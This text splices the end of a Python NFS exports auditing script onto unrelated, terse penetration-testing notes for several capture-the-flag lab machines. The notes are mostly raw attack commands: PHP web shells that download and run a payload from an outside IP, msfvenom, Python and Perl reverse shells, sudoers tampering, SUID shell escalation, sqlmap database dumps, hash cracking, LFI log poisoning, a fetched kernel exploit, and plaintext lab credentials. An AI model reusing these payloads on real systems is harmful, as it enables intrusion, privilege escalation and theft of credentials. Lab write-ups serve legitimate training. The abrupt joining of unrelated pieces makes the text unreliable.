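    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append((path, client,
                             "no_root_squash: a remote root user keeps uid 0 on this share"))
        if client == "*":
            findings.append((path, client, "exported to every host"))
        if "rw" in opts and "all_squash" not in opts:
            findings.append((path, client,
                             "rw without all_squash: the client's own uids are trusted, "
                             "so matching a uid locally (useradd -u N) grants that user's access"))
    return findings


def audit_exports_file(path="/etc/exports"):
    """Run the audit on a real exports file."""
    with open(path) as fh:
        return audit_exports(fh.read())


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print("%-14s %-20s %s" % (path, client, finding))
```

On the sample, /root is reported three times (no_root_squash, world-exported, and rw with uids trusted), /home/vulnix twice, and the read-only, all_squash, network-restricted /srv/data not at all, which is the shape a share should have if it must be exported.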
===================================================================================
5th January
The end of the URL, “php?page=tools.html” looks like we could do some directory traversal with it. Let’s give it a shot and see if we can print out /etc/passwd.
searchsploit phpliteadmin
create a malicious database and got the shell
../../../usr/databases/shell.php
<?php system("whoami; wget http://192.168.55.4/shellme; chmod +x shellme; ./shellme"); ?>
msfvenom --platform Linux -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.55.4 LPORT=2501 -f elf -o shellme
python tty shell
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/$
we got the password of zico through wp-config.php
==========================================================
nmap -Pn -T4 -A ip
curl -v -X OPTIONS ip/test/ - PUT method enabled
curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://ip/test/shell.php
curl --upload-file /var/www/html/shell.php -H "Expect: *" 192.168.56.101/test/shell.php
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
After this I quickly googled for any chkrootkit related exploits and found this on exploit-db:
chkrootkit
ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
echo "perl -e 'use Socket;\$i=\"192.168.209.151\";\$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" > /tmp/update
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash
./bash -p
==========================================================
check licence files
arbitrary file upload for builderengine
builderengine v3 exploit for user shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=4444 -f raw > shell.php
dirty cow for local priv escalation
================================================
Using nmap to find opened ports & running services.
Detecting technologies used to build web apps.
Checking robots.txt file.
Searching & using public exploits.
Uploading shell to drupal CMS.
Creating reverse shell using ncat (nc).
Privilege escalation using SUID binaries.
Collect important information from PHP configuration files.
Cracking Linux credentials.
searchsploit drupal
upload reverse shell and back to the connection
find / -perm 4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find . -exec '/bin/sh' \;
find / -name flag*
find /root/thefinalflag.txt -type f -exec cat '{}' \;
===================================================
Wordpress exploit
wpscan --url ip -U users -P password
ssh [email protected] -p 7744
After escaping the restricted shell, we export "/bin/bash" as our SHELL environment variable and "/usr/bin" in our PATH environment variable so that we can run Linux commands properly.
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
sudo -l
/usr/bin/git
sudo git help add
!/bin/bash
So, I tried to log in to this SSH service using the extracted credentials and I succeeded. But I could not run any Linux command. This happened because the shell is a restricted shell. So, I tried to escape it using the vi editor.
vi
:set shell=/bin/sh
export PATH=$PATH:/bin:/usr/bin
====================================
Penetrating Methodology:
Discovering Targets IP
Network scanning (Nmap)
Surfing HTTP service port
Searching exploits via searchsploit
Using SQLMAP to dump databases information
Using John the Ripper to Crack the Password
Login into JOOMLA
Inject malicious PHP Reverse Shell Code
Using Netcat for obtaining reverse connection
Exploit the kernel
Getting root access
Reading Final flag
joomla sql injection
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
john hash
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt --force
After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.
beez3 template -> reverse shell
In my journey, I came across an interesting page – Extensions > Templates
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a
ubuntu 16 exploit
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39772.zip
ls
cd 39772
ls
tar -xvf exploit.tar
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt
(find / -perm -u=s -type f 2>/dev/null)
ntfs-3g
4.4.x
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
=======================================================
nmap -A 192.168.1.101
We Fired UP!! burpsuite using rockyou.txt to get valid login. Username- admin
After bruteforcing, we have found the password for Admin i.e Password- happy
command .php Let’s check out subdirectories in the /home directory. We have found 3 users i.e Charles, Jim and Sam.
old.passwords.bak
Username- jim Password- jibril04 ssh [email protected]
Username- Charles Password- ^xHhA&hvim0y
nc -lvnp 4444
==================================================================
nmap -A 192.168.1.108
LFI
wfuzz -w /usr/share/wfuzz/wordlist/general/test.txt -w /usr/share/wordlist/injections/lfi.txt http://ip/thankyou.php?FUZZ=FUZZ
Therefore, I Quickly checked for LFI Vulnerability by obtaining the /etc/passwd file as shown below.
file=/var/log/nginx/access.log Let's capture the request of the Nginx access log file using Burpsuite. Here we will be using LFI to exploit the web server's access log.
In place of the file path, we have injected a Code to get the command line access by making a GET request to the Server.
So, I tried to view many files like : /etc/passwd, /etc/shadow, & /var/log/nginx/access.log. I found that some of them can be viewed (passwd & access.log).
To verify whether it is working or not, we have added a new parameter to the URL, i.e. &cmd=id. The output confirms we have successfully executed the command on the server. /var/log/nginx/error.log&cmd=id
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
Screen exploit
==================================================
nmap -sn ip/24
nmap -A -p- ip
whatweb ip
wpscan --url http://ip
I found that there is an interesting directory called "ipdata" with directory listing enabled.
After downloading, opening, and analyzing the file using wireshark, I found that it contains a request to the WordPress admin area. That request contains the credentials for the WordPress.
username : webdeveloper password : Te5eQg&4sB!Yr$)wf%(DcAd
ssh [email protec